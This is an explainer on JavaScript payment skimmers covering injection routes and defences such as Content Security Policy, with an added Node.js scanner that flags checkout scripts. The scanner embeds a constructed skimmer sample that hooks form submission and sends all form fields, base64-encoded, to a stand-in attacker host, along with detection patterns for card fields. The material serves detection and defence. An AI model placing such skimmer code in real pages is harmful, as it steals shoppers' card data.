What is a JavaScript Skimmer?
A JavaScript skimmer is malicious code injected into the checkout or payment pages of an online store, the web equivalent of a card skimmer fitted to a point-of-sale terminal. Attackers deliver it in several ways, but the objective is the same: capture payment card numbers and personal data as customers type them, then sell that data on criminal markets. Because the injected script runs in the shopper's browser alongside the store's own code, the checkout keeps working normally; customers submit their payment details unaware that a copy is being sent to a server controlled by whoever planted the code. E-commerce operators therefore need to keep up with the delivery methods and behaviour of JavaScript skimmers, which threaten hundreds of thousands of companies and businesses.
How Do JavaScript Skimmers Work?
Skimming began with physical devices fitted to point-of-sale hardware such as ATMs and card terminals. Its online form needs no hardware: a few lines of JavaScript injected into a checkout page can capture the same card data from every customer who pays. Today the e-commerce industry faces several criminal groups that distribute such JavaScript malware to exfiltrate customers' card details and personal data. The injected code runs in the shopper's browser, reads the values of the payment form fields (for example by hooking the form's submit event or polling the inputs) and sends a copy to an attacker-controlled server, often after encoding the data and hiding the destination domain. The difficulty for defenders is that this code is small, frequently obfuscated, and may sit inside an otherwise legitimate script, so it can go undetected by both automated scanners and analysts reviewing the page by hand.
- Supply Chain Attack: The attacker compromises a third-party vendor whose code the store loads into its pages, for example a hosted analytics, chat, or advertising script, and adds the skimmer to that code. Every site that includes the vendor's script then serves the skimmer to its own customers, with no change to the store's servers and no need to breach the store at all.
- Direct Hack of Website: The attacker obtains administrator credentials, for example by brute-forcing a weak password, and edits the site's own JavaScript or page templates to add the skimmer. This most commonly happens on CMS (Content Management System) platforms, where one compromised admin account gives direct control over the code every visitor receives.
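As an added example (not code from the original article), here is a small static triage scanner in Node.js for the behaviour described above. A checkout skimmer has to do two things: read the payment fields, and send them to a host the shop never otherwise talks to, often hiding that destination behind a base64-encoded string. The allowlist, the indicator patterns and the three sample scripts (a constructed skimmer, an analytics beacon, and the shop's own checkout routine) are all made up for this illustration.

```javascript
// Added example (not code from the original article): a static triage scanner
// for the behaviour described above. A checkout skimmer must (1) read payment
// fields and (2) send them to a host the shop never talks to, often hiding that
// destination behind base64. The allowlist, the indicator patterns and the three
// sample scripts below are all constructed for this illustration.

// Hosts the shop legitimately talks to (constructed).
const ALLOWED_HOSTS = ["shop.example", "cdn.shop.example", "api.shop.example"];

// Signs that a script reads payment data: card-field names, wholesale
// enumeration of form inputs, or a hook on form submission.
const FIELD_NAMES = /\b(?:card_?number|ccnum|cc_?number|cvv2?|cvc|expir\w*|exp_?(?:month|year|date))\b/i;
const FORM_HARVEST = /querySelectorAll\(\s*['"](?:input|select|form)[^'"]*['"]|document\.forms\b|addEventListener\(\s*['"]submit['"]/i;

// Encoding primitives used to hide the payload or the destination.
const ENCODING = /\bbtoa\s*\(|\batob\s*\(|String\.fromCharCode/;

const URL_HOST = /https?:\/\/([a-z0-9.-]+)/gi;
const BASE64_LITERAL = /['"]([A-Za-z0-9+\/]{16,}={0,2})['"]/g;

function isAllowedHost(host) {
  return ALLOWED_HOSTS.some((a) => host === a || host.endsWith("." + a));
}

// Every hostname in the script, including those that only appear after
// base64-decoding a string literal (a common skimmer trick).
function extractHosts(source) {
  const texts = [source];
  for (const [, b64] of source.matchAll(BASE64_LITERAL)) {
    texts.push(Buffer.from(b64, "base64").toString("utf8"));
  }
  const hosts = new Set();
  for (const text of texts) {
    for (const [, host] of text.matchAll(URL_HOST)) hosts.add(host.toLowerCase());
  }
  return [...hosts];
}

// The verdict rests on the combination: field access plus an unlisted destination.
function triageScript(name, source) {
  const harvests = FIELD_NAMES.test(source) || FORM_HARVEST.test(source);
  const encodes = ENCODING.test(source);
  const offsiteHosts = extractHosts(source).filter((h) => !isAllowedHost(h));
  let verdict = "clean";
  if (harvests && offsiteHosts.length > 0) verdict = "likely-skimmer";
  else if (offsiteHosts.length > 0) verdict = "review"; // unknown third party, no field access seen
  return { name, harvests, encodes, offsiteHosts, verdict };
}

// Constructed sample 1: a skimmer. The exfil URL is base64-encoded at build
// time so the literal is exact; real skimmers ship it pre-encoded.
const HIDDEN_URL = Buffer.from("https://collect.attacker.example/g").toString("base64");
const SKIMMER_SAMPLE = `
document.addEventListener('submit', function () {
  var o = {};
  document.querySelectorAll('input, select').forEach(function (i) { o[i.name] = i.value; });
  if (o.cardnumber && o.cvv) {
    new Image().src = atob('${HIDDEN_URL}') + '?d=' + btoa(JSON.stringify(o));
  }
});`;

// Constructed sample 2: a first-party analytics beacon to an allowed host.
const ANALYTICS_SAMPLE = `
navigator.sendBeacon('https://api.shop.example/pageview',
  JSON.stringify({ path: location.pathname, ref: document.referrer }));`;

// Constructed sample 3: the shop's own checkout code. It reads card fields,
// but only talks to the shop's API, so it must not be flagged.
const CHECKOUT_SAMPLE = `
async function submitCard(form) {
  const body = { number: form.cardnumber.value, cvv: form.cvv.value, exp: form.expiry.value };
  const r = await fetch('https://api.shop.example/v1/charge', { method: 'POST', body: JSON.stringify(body) });
  return r.ok;
}`;

function triageAll() {
  return [
    triageScript("skimmer", SKIMMER_SAMPLE),
    triageScript("analytics", ANALYTICS_SAMPLE),
    triageScript("checkout", CHECKOUT_SAMPLE),
  ];
}

for (const r of triageAll()) console.log(r.name, r.verdict, r.offsiteHosts);
```

Run it with `node`. The point is the combination: reading card fields is normal on a checkout page and contacting an unlisted host is normal for a tag, so neither alone is a finding; the legitimate checkout routine and the analytics beacon both come back clean, while the sample skimmer, whose destination only appears after decoding, is flagged. Skimmers that assemble the hostname from character codes at runtime defeat this kind of static check and need dynamic analysis, which is the evasion the text warns about.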
How to Protect Against JavaScript Skimmers?
JavaScript skimmer attacks continue to plague the e-commerce industry, but there are measures that companies can implement to protect their checkout pages and their customers' data.
- Implementing Content Security Policy (CSP): A CSP is an HTTP response header that tells the browser which origins may serve scripts to the page (script-src) and where the page is allowed to send data (connect-src, img-src and form-action). With each directive restricted to the store's own origin and its known vendors, a skimmer that does get injected cannot load further code or deliver the stolen fields to an attacker-controlled domain: the browser refuses the request, and reports the violation if reporting is configured. Two caveats apply. CSP limits where data can go, not whether injected code runs, so a skimmer planted inside an already-allowed first-party or vendor script still executes; nonces or hashes for inline scripts, and Subresource Integrity on third-party script tags, close that gap. And a policy that leaves default-src permissive or omits form-action leaves those exfiltration channels open even when script-src looks strict.
- Client-Side Extensions: Browser extensions that block or restrict third-party scripts give visitors more control over what runs on the pages they use, and can stop a skimmer that loads from, or reports to, an unknown domain. Users who want to go further can browse with third-party scripts disabled entirely; this breaks some sites, but it removes a common delivery route for JavaScript skimmers. Note that this protects the individual shopper rather than the store, and it cannot catch a skimmer served from the store's own domain.